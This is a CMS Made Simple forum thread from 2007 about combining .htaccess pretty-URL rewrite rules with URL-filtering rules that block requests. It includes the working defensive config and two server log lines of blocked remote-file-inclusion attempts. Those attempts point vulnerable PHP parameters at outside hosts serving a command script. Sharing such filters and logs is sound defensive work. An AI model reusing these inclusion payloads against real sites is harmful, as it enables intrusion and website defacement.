[SOLVED].htacces URL Filtering combined with Pretty URLS

For questions and problems with the CMS core. This board is NOT for any 3rd party modules, addons, PHP scripts or anything NOT distributed with the CMS made simple package itself.
Locked
Signex

[SOLVED].htacces URL Filtering combined with Pretty URLS

Post by Signex »

I have a website on which I`m using Mod_rewrite for pretty urls using this code

Code: Select all

Options +FollowSymLinks
RewriteEngine on
RewriteBase /

# 301 Redirect all requests that don't contain a dot or trailing slash to
# include a trailing slash
RewriteCond %{REQUEST_URI} !/$
RewriteCond %{REQUEST_URI} !\.
RewriteRule ^(.*) %{REQUEST_URI}/ [R=301,L]

# Rewrites urls in the form of /parent/child/
# but only rewrites if the requested URL is not a file or directory
RewriteCond %{REQUEST_FILENAME} !-f [NC]
RewriteCond %{REQUEST_FILENAME} !-d [NC]
RewriteRule ^(.+)$ index.php?page=$1 [QSA]
This method works fine, but now I want to include some url filtering to block potentail hackers. I want to include this code

Code: Select all

#IF the URI contains a "http:"
RewriteCond %{REQUEST_URI} http\: [OR]

#OR if the URI contains a "["
RewriteCond %{REQUEST_URI} \[ [OR]

#OR if the URI contains a "]"
RewriteCond %{REQUEST_URI} \] [OR]

#OR if the URI contains a "<__script__>"
RewriteCond %{REQUEST_URI} (\<|%3C).*script.*(\>|%3E) [NC,OR]

#OR script trying to set a PHP GLOBALS variable via URL
RewriteCond %{REQUEST_URI} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

#OR any script trying to modify a _REQUEST variable via URL
RewriteCond %{REQUEST_URI} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) 

RewriteRule ^.*$ - [F,L]
So basicly I end up with this when I combine both

Code: Select all

Options +FollowSymLinks
RewriteEngine on
RewriteBase /

#IF the URI contains a "http:"
RewriteCond %{REQUEST_URI} http\: [OR]

#OR if the URI contains a "["
RewriteCond %{REQUEST_URI} \[ [OR]

#OR if the URI contains a "]"
RewriteCond %{REQUEST_URI} \] [OR]

#OR if the URI contains a "<__script__>"
RewriteCond %{REQUEST_URI} (\<|%3C).*script.*(\>|%3E) [NC,OR]

#OR script trying to set a PHP GLOBALS variable via URL
RewriteCond %{REQUEST_URI} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

#OR any script trying to modify a _REQUEST variable via URL
RewriteCond %{REQUEST_URI} _REQUEST(=|\[|\%[0-9A-Z]{0,2})

RewriteRule ^.*$ - [F,L] 

# 301 Redirect all requests that don't contain a dot or trailing slash to
# include a trailing slash
RewriteCond %{REQUEST_URI} !/$
RewriteCond %{REQUEST_URI} !\.
RewriteRule ^(.*) %{REQUEST_URI}/ [R=301,L]

# Rewrites urls in the form of /parent/child/
# but only rewrites if the requested URL is not a file or directory
RewriteCond %{REQUEST_FILENAME} !-f [NC]
RewriteCond %{REQUEST_FILENAME} !-d [NC]
RewriteRule ^(.+)$ index.php?page=$1 [QSA]
But pretty urls still work, but url filtering doesnt, it gives 404 errors instead of 403 errors like it should. If i try only the url filtering on a website which doesnt use pretty url mod_rewrtie the url filtering works fine?

Any ideas on how i can get both url filtering and pretty urls to work ?

Thank You.
Last edited by Signex on Tue Sep 25, 2007 5:24 pm, edited 1 time in total.
Top
Signex

Re: .htacces URL Filtering combined with Pretty URLS

Post by Signex »

Solved in this topic : http://forum.cmsmadesimple.org/index.ph ... 45.15.html

using this code pretty urls en filtering works:

Code: Select all

ErrorDocument 403 /forbidden403.html

Options +FollowSymLinks
RewriteEngine on
RewriteBase /

#IF the URI contains a "http:"
RewriteCond %{QUERY_STRING} http\: [OR]

#OR if the URI contains a "["
RewriteCond %{QUERY_STRING} \[ [OR]

#OR if the URI contains a "]"
RewriteCond %{QUERY_STRING} \] [OR]

#OR if the URI contains a "<__script__>"
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]

#OR script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

#OR any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) 

RewriteRule ^.*$ - [F,L] 

# Rewrites urls in the form of /parent/child/
# but only rewrites if the requested URL is not a file or directory
RewriteCond %{REQUEST_FILENAME} !-f 
RewriteCond %{REQUEST_FILENAME} !-d 
RewriteRule ^(.+)$ index.php?page=$1 [QSA]
Top
User avatar
kermit
Power Poster
Power Poster
Posts: 693
Joined: Thu Jan 26, 2006 11:46 am

Re: .htacces URL Filtering combined with Pretty URLS

Post by kermit »

Signex wrote: Solved in this topic : http://forum.cmsmadesimple.org/index.ph ... 45.15.html

using this code pretty urls en filtering works:

Code: Select all

ErrorDocument 403 /forbidden403.html

Options +FollowSymLinks
RewriteEngine on
RewriteBase /

#IF the URI contains a "http:"
RewriteCond %{QUERY_STRING} http\: [OR]

#OR if the URI contains a "["
RewriteCond %{QUERY_STRING} \[ [OR]

#OR if the URI contains a "]"
RewriteCond %{QUERY_STRING} \] [OR]

#OR if the URI contains a "<__script__>"
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]

#OR script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

#OR any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) 

RewriteRule ^.*$ - [F,L] 

# Rewrites urls in the form of /parent/child/
# but only rewrites if the requested URL is not a file or directory
RewriteCond %{REQUEST_FILENAME} !-f 
RewriteCond %{REQUEST_FILENAME} !-d 
RewriteRule ^(.+)$ index.php?page=$1 [QSA]
attached is an example of how effective these few lines are...

even if there isn't any exploitable bugs in cmsms; there's no good reason not to add the url filtering to you htaccess file..
Attachments
urlfiltering-results.png
Last edited by kermit on Thu Nov 22, 2007 1:40 pm, edited 1 time in total.
eternity (n); 1. infinite time, 2. a seemingly long or endless time, 3. the length of time it takes a frozen pizza to cook when you're starving.
4,930,000,000 (n); 1. a very large number, 2. the approximate world population in 1986 when Microsoft Corp issued its IPO. 3. Microsoft's net profit (USD) for the quarter (3 months) ending 31 March 2007.
CMSMS migration and setup services | Hosting with CMSMS installed and ready to go | PM me for Info
Top
Pierre M.

Re: .htacces URL Filtering combined with Pretty URLS

Post by Pierre M. »

Hello,
kermit wrote: attached is an example of how effective these few lines are...
The image shows 403 in logs. So your rules are effective, yes they block requests. I'd like to see against what they are effective : what are the naughty URLs it has denied access, before they reach PHP/CMSms ?
kermit wrote: there's no good reason not to add the url filtering to you htaccess file..
Amen.

Pierre M.
Top
User avatar
kermit
Power Poster
Power Poster
Posts: 693
Joined: Thu Jan 26, 2006 11:46 am

Re: .htacces URL Filtering combined with Pretty URLS

Post by kermit »

Pierre M. wrote: I'd like to see against what they are effective : what are the naughty URLs it has denied access, before they reach PHP/CMSms ?

most of those were all in about 20 minutes time... they were all one of these two (or variations of them):

Code: Select all

218.232.75.175 - - [20/Nov/2007:18:19:49 -0800] "GET /include/main.php?config[search_disp]=true&include_dir=http://1-content.com/safe.gif? HTTP/1.1" 403 666 "-" "libwww-perl/5.79"
213.192.241.64 - - [20/Nov/2007:21:49:19 -0800] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 403 666 "-" "libwww-perl/5.803"

the useragent libwww-perl would be nearly as effective (and would also nail some 'bad' bots in the process) to filter...  these clowns can deface thousands of websites in a matter of minutes.. yet they have yet to master the art of faking useragent strings to get around those types of filters?!?!
eternity (n); 1. infinite time, 2. a seemingly long or endless time, 3. the length of time it takes a frozen pizza to cook when you're starving.
4,930,000,000 (n); 1. a very large number, 2. the approximate world population in 1986 when Microsoft Corp issued its IPO. 3. Microsoft's net profit (USD) for the quarter (3 months) ending 31 March 2007.
CMSMS migration and setup services | Hosting with CMSMS installed and ready to go | PM me for Info
Top
Pierre M.

Re: [SOLVED].htacces URL Filtering combined with Pretty URLS

Post by Pierre M. »

Thank you kermit for the feedback.
They don't fake the useragent : LOL :-D

Pierre M.
Top
Locked

Return to “CMSMS Core”